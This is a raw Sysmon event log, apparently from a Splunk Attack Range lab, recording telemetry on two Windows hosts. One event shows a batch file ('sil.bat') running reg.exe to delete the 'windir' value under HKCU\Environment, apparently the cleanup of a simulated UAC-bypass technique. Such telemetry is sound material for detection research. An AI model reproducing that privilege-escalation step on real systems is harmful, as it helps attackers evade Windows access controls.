AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51092-false10.0.1.12-8089- 23542300x80000000000000001050800Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:59.247{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79123B595923332BE8EC1CC793538076,SHA256=1B440AB23887F237F06EA910D8678D3EFE72BF3FF88B4B4F65E2973FCE994B1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050799Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:59.114{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1AE52332C0955F75D25FBBBCC5DBAFD,SHA256=3551A2B31F83D0C12D487B79CE21986D396D56F6F488A3ED0C05BC3BC867EB33,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808416Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:56.798{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57326-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000808418Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:00.637{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A2DF5D59F92FAE29149F65A5DCCB55F,SHA256=B42942E62C8D73FF778C227AC6A3CE6872311CA689F96F833721BB1CF8B35385,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050809Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:00.773{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001050808Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:00.773{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001050807Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:00.773{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f 10341000x80000000000000001050806Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:00.773{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 23542300x80000000000000001050805Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:00.772{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFf6da511.TMPMD5=FEEDDF0B48ACBAE2DF2C13E094BA61E1,SHA256=564E4AC53FEF38F8EC2ADC3773CA3AE2E546D9CF626CDED40CA8B8DCCA4D789B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050804Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:00.231{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA1D2A62BD4668997789D393B34CDF4D,SHA256=2D00B1BFD515668A4170E50D57EE008D6F4E949BD88861824D477023C1099CBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808419Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:01.684{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D3E0B6E01C864553D98A084461C352C,SHA256=ADDCFED888A2DDD37106EA7A31676E0CA6E4D848A7701FBB8C943F96BD2C0459,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050822Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.828{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.78.54.188-13755-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 10341000x80000000000000001050821Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:01.620{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050820Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:01.619{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla 
Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050819Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:01.254{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E8458AC72C5CE20F3BADF7D18AD9945,SHA256=47B2FC756D48C512D11F0AB66AF236BD03AC27E62DC2BF06DEDA7499216AFA84,IMPHASH=00000000000000000000000000000000falsetrue 12241200x80000000000000001050818Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 07:57:01.239{466BC892-F5CD-60EB-6F7D-00000000CF01}4188C:\Windows\system32\reg.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112\Environment\windir 10341000x80000000000000001050817Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:01.202{466BC892-F5C8-60EB-657D-00000000CF01}84086488C:\Windows\system32\conhost.exe{466BC892-F5CD-60EB-6F7D-00000000CF01}4188C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050816Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:01.171{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050815Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:01.171{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050814Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:01.171{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050813Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:01.171{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F5CD-60EB-6F7D-00000000CF01}4188C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050812Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:01.171{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050811Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:01.171{466BC892-F5C8-60EB-647D-00000000CF01}98726276C:\Windows\system32\cmd.exe{466BC892-F5CD-60EB-6F7D-00000000CF01}4188C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050810Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:01.176{466BC892-F5CD-60EB-6F7D-00000000CF01}4188C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft 
Corporationreg.exereg delete "HKCU\Environment" /v "windir" /FC:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\test\sil.bat" " 23542300x8000000000000000808420Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:02.715{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5541FE6A677AE55D19B00782A4B0CC4D,SHA256=BAC85624122442268E57CAB3A229135F4E59258A4CC192FB98BF63FDB8904D7D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050826Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:02.711{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5CA-60EB-6A7D-00000000CF01}9944C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050825Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:02.711{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5CA-60EB-6A7D-00000000CF01}9944C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050824Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:02.259{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07F5DD006E2E5CDCE2E121412A6D53AF,SHA256=46E62F5BF19E83ACEBFF4E087EDD5C7430590A0ED44AF4A6AFCB26C08FE4AFC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050823Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:02.184{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EC35A54E105D7968A2C7362F026A0D8D,SHA256=22CB951706299724BF1919B8DB6A1EDC5073215771F7A2AB7A3B520EF0989E4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808422Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:03.746{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B4CBC8526FDB176290F4E330B8D03A8,SHA256=88AFB726B34CA2042808A5B81175A81619645682F91A9383E67985CB58959B0B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050849Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.295{466BC892-F5CF-60EB-717D-00000000CF01}19089560C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe{466BC892-F5CF-60EB-707D-00000000CF01}1196C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 23542300x80000000000000001050848Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.279{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EACBBE82E02D3797FB545A86F223541,SHA256=B34C34A334B9D0104D18E71EC5D3CB61BAECD9DFFAB202C0DB101D72D9088A40,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808421Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:02.332{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57327-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001050847Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.175{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F5CF-60EB-717D-00000000CF01}1908C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050846Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:03.157{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050845Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 